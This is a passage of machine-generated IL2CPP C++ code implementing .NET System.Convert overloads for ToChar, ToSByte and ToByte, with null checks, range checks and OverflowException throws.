IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_mA5935B08EA798B0EFFE6EA960B9F23B43F8F44AF (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_mA5935B08EA798B0EFFE6EA960B9F23B43F8F44AF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___value0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteralF32B67C7E26342AF42EFABC674D441DCA0A281C5, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, Convert_ToChar_mA5935B08EA798B0EFFE6EA960B9F23B43F8F44AF_RuntimeMethod_var); } IL_000e: { String_t* L_2 = ___value0; int32_t L_3 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_2, /*hidden argument*/NULL); if ((((int32_t)L_3) == ((int32_t)1))) { goto IL_0027; } } { String_t* L_4 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB66A404869995E54B8D48D938E63CA3C7D1C7DCD, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_5 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_5, L_4, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_5, NULL, Convert_ToChar_mA5935B08EA798B0EFFE6EA960B9F23B43F8F44AF_RuntimeMethod_var); } IL_0027: { String_t* L_6 = ___value0; Il2CppChar L_7 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_6, 0, /*hidden argument*/NULL); return L_7; } } // System.SByte System.Convert::ToSByte(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m2716303126BD8C930D1D4E8590F8706A8F26AD48 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m2716303126BD8C930D1D4E8590F8706A8F26AD48_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; int8_t L_3 = InterfaceFuncInvoker1< int8_t, RuntimeObject* >::Invoke(3 /* System.SByte System.IConvertible::ToSByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (int8_t)0; } } // System.SByte System.Convert::ToSByte(System.Boolean) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_mE5314E3F9BD2A1FB38C2E8F91065A515DB980349 (bool ___value0, const RuntimeMethod* method) { { bool L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (int8_t)0; } IL_0005: { return (int8_t)1; } } // System.SByte System.Convert::ToSByte(System.Char) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m0D0A382E0BFF2DAE7019CAB2F6309EB48EFFFD94 (Il2CppChar ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m0D0A382E0BFF2DAE7019CAB2F6309EB48EFFFD94_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Il2CppChar L_0 = ___value0; if ((((int32_t)L_0) <= ((int32_t)((int32_t)127)))) { goto IL_0015; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToSByte_m0D0A382E0BFF2DAE7019CAB2F6309EB48EFFFD94_RuntimeMethod_var); } IL_0015: { Il2CppChar L_3 = ___value0; return (((int8_t)((int8_t)L_3))); } } // System.SByte System.Convert::ToSByte(System.Byte) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m750B83AD00E06419AEDFE4436323AF85520E3E00 (uint8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m750B83AD00E06419AEDFE4436323AF85520E3E00_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint8_t L_0 = ___value0; if ((((int32_t)L_0) <= ((int32_t)((int32_t)127)))) { goto IL_0015; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToSByte_m750B83AD00E06419AEDFE4436323AF85520E3E00_RuntimeMethod_var); } IL_0015: { uint8_t L_3 = ___value0; return (((int8_t)((int8_t)L_3))); } } // System.SByte System.Convert::ToSByte(System.Int16) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_mCC85C35F01295663A487DDA2C4855C5962ADA2AF (int16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_mCC85C35F01295663A487DDA2C4855C5962ADA2AF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int16_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)((int32_t)-128)))) { goto IL_000a; } } { int16_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)127)))) { goto IL_001a; } } IL_000a: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToSByte_mCC85C35F01295663A487DDA2C4855C5962ADA2AF_RuntimeMethod_var); } IL_001a: { int16_t L_4 = ___value0; return (((int8_t)((int8_t)L_4))); } } // System.SByte System.Convert::ToSByte(System.UInt16) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m4455F931B18E5D87DE1F99B2686F3D4770E9D177 (uint16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m4455F931B18E5D87DE1F99B2686F3D4770E9D177_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint16_t L_0 = ___value0; if ((((int32_t)L_0) <= ((int32_t)((int32_t)127)))) { goto IL_0015; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToSByte_m4455F931B18E5D87DE1F99B2686F3D4770E9D177_RuntimeMethod_var); } IL_0015: { uint16_t L_3 = ___value0; return (((int8_t)((int8_t)L_3))); } } // System.SByte System.Convert::ToSByte(System.Int32) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m65A58DC38CC3A2E7B1D2546EC2FE0803AAB03F34 (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m65A58DC38CC3A2E7B1D2546EC2FE0803AAB03F34_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)((int32_t)-128)))) { goto IL_000a; } } { int32_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)127)))) { goto IL_001a; } } IL_000a: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToSByte_m65A58DC38CC3A2E7B1D2546EC2FE0803AAB03F34_RuntimeMethod_var); } IL_001a: { int32_t L_4 = ___value0; return (((int8_t)((int8_t)L_4))); } } // System.SByte System.Convert::ToSByte(System.UInt32) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m2BA3408A7B10119B60B923928EFCFA17D3C46D50 (uint32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m2BA3408A7B10119B60B923928EFCFA17D3C46D50_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint32_t L_0 = ___value0; if ((((int64_t)(((int64_t)((uint64_t)L_0)))) <= ((int64_t)(((int64_t)((int64_t)((int32_t)127))))))) { goto IL_0017; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToSByte_m2BA3408A7B10119B60B923928EFCFA17D3C46D50_RuntimeMethod_var); } IL_0017: { uint32_t L_3 = ___value0; return (((int8_t)((int8_t)L_3))); } } // System.SByte System.Convert::ToSByte(System.Int64) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m1A4B3CD0081049789B368AE723C5214669A80767 (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m1A4B3CD0081049789B368AE723C5214669A80767_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)((int32_t)-128))))))) { goto IL_000c; } } { int64_t L_1 = ___value0; if ((((int64_t)L_1) <= ((int64_t)(((int64_t)((int64_t)((int32_t)127))))))) { goto IL_001c; } } IL_000c: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToSByte_m1A4B3CD0081049789B368AE723C5214669A80767_RuntimeMethod_var); } IL_001c: { int64_t L_4 = ___value0; return (((int8_t)((int8_t)L_4))); } } // System.SByte System.Convert::ToSByte(System.UInt64) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m5F3E822A40FB8BC9DCE9D39C07D0BFDB5CAE38C3 (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m5F3E822A40FB8BC9DCE9D39C07D0BFDB5CAE38C3_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)(((int64_t)((int64_t)((int32_t)127)))))))) { goto IL_0016; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralDA1DBE1D71E85DD42A6EC593E9C205353A24D35D, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToSByte_m5F3E822A40FB8BC9DCE9D39C07D0BFDB5CAE38C3_RuntimeMethod_var); } IL_0016: { uint64_t L_3 = ___value0; return (((int8_t)((int8_t)L_3))); } } // System.SByte System.Convert::ToSByte(System.Single) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_mFFC0642A84BC819A5DED67F18AD2ED18A8F80CD1 (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_mFFC0642A84BC819A5DED67F18AD2ED18A8F80CD1_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int8_t L_1 = Convert_ToSByte_m286EC501DE7B1980DE30BBB28DDA70AE4BB696E5((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.SByte System.Convert::ToSByte(System.Double) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m286EC501DE7B1980DE30BBB28DDA70AE4BB696E5 (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m286EC501DE7B1980DE30BBB28DDA70AE4BB696E5_MetadataUsageId); s_Il2CppMethodInitialized = true; } { double L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int32_t L_1 = Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C(L_0, /*hidden argument*/NULL); int8_t L_2 = Convert_ToSByte_m65A58DC38CC3A2E7B1D2546EC2FE0803AAB03F34(L_1, /*hidden argument*/NULL); return L_2; } } // System.SByte System.Convert::ToSByte(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m97BA7655D1C139BC268A90E503AFD4489558BE32 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSByte_m97BA7655D1C139BC268A90E503AFD4489558BE32_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801(L_0, 0, /*hidden argument*/NULL); int8_t L_2 = Decimal_ToSByte_m7AB199A01D92932483C3F2B1CA7C5C837758395D(L_1, /*hidden argument*/NULL); return L_2; } } // System.SByte System.Convert::ToSByte(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m99276268DD000617F23A0B3445C4CA2A8B2BD275 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; RuntimeObject* L_1 = ___provider1; int8_t L_2 = SByte_Parse_m3CCD04AED0DC62F729DFA2FF45DA1E4C8BACDD60(L_0, 7, L_1, /*hidden argument*/NULL); return L_2; } } // System.Byte System.Convert::ToByte(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m71CFEFDB61F13E2AD7ECF91BA5DEE0616C1E857A (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_m71CFEFDB61F13E2AD7ECF91BA5DEE0616C1E857A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint8_t L_3 = InterfaceFuncInvoker1< uint8_t, RuntimeObject* >::Invoke(4 /* System.Byte System.IConvertible::ToByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (uint8_t)0; } } // System.Byte System.Convert::ToByte(System.Boolean) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m2F75DB84C61D7D1D64393FD5756A9C9DE04FF716 (bool ___value0, const RuntimeMethod* method) { { bool L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (uint8_t)0; } IL_0005: { return (uint8_t)1; } } // System.Byte System.Convert::ToByte(System.Char) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mF058F63299585352A96AB211EF4DA55B9996ADA5 (Il2CppChar ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_mF058F63299585352A96AB211EF4DA55B9996ADA5_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Il2CppChar L_0 = ___value0; if ((((int32_t)L_0) <= ((int32_t)((int32_t)255)))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToByte_mF058F63299585352A96AB211EF4DA55B9996ADA5_RuntimeMethod_var); } IL_0018: { Il2CppChar L_3 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_3))); } } // System.Byte System.Convert::ToByte(System.SByte) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m7D3D6E8B30620A208FC31EE6C29087EA6FDFF923 (int8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_m7D3D6E8B30620A208FC31EE6C29087EA6FDFF923_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int8_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToByte_m7D3D6E8B30620A208FC31EE6C29087EA6FDFF923_RuntimeMethod_var); } IL_0014: { int8_t L_3 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_3))); } } // System.Byte System.Convert::ToByte(System.Int16) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m2DDDB2A7442059FE2185B347BB71BF7577781807 (int16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_m2DDDB2A7442059FE2185B347BB71BF7577781807_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int16_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)0))) { goto IL_000c; } } { int16_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)255)))) { goto IL_001c; } } IL_000c: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToByte_m2DDDB2A7442059FE2185B347BB71BF7577781807_RuntimeMethod_var); } IL_001c: { int16_t L_4 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_4))); } } // System.Byte System.Convert::ToByte(System.UInt16) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m4D9F94693332601CE2F1CF8DB9933F7C0FE882B1 (uint16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_m4D9F94693332601CE2F1CF8DB9933F7C0FE882B1_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint16_t L_0 = ___value0; if ((((int32_t)L_0) <= ((int32_t)((int32_t)255)))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToByte_m4D9F94693332601CE2F1CF8DB9933F7C0FE882B1_RuntimeMethod_var); } IL_0018: { uint16_t L_3 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_3))); } } // System.Byte System.Convert::ToByte(System.Int32) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mC952E2B42FF6008EF2123228A0BFB9054531EB64 (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_mC952E2B42FF6008EF2123228A0BFB9054531EB64_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)0))) { goto IL_000c; } } { int32_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)255)))) { goto IL_001c; } } IL_000c: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToByte_mC952E2B42FF6008EF2123228A0BFB9054531EB64_RuntimeMethod_var); } IL_001c: { int32_t L_4 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_4))); } } // System.Byte System.Convert::ToByte(System.UInt32) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m5B2E3D791EE1E14A7604D126C24AA62FE2587B60 (uint32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_m5B2E3D791EE1E14A7604D126C24AA62FE2587B60_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint32_t L_0 = ___value0; if ((!(((uint32_t)L_0) > ((uint32_t)((int32_t)255))))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToByte_m5B2E3D791EE1E14A7604D126C24AA62FE2587B60_RuntimeMethod_var); } IL_0018: { uint32_t L_3 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_3))); } } // System.Byte System.Convert::ToByte(System.Int64) extern "C" IL2CPP_METHOD_ATTR uint8_t 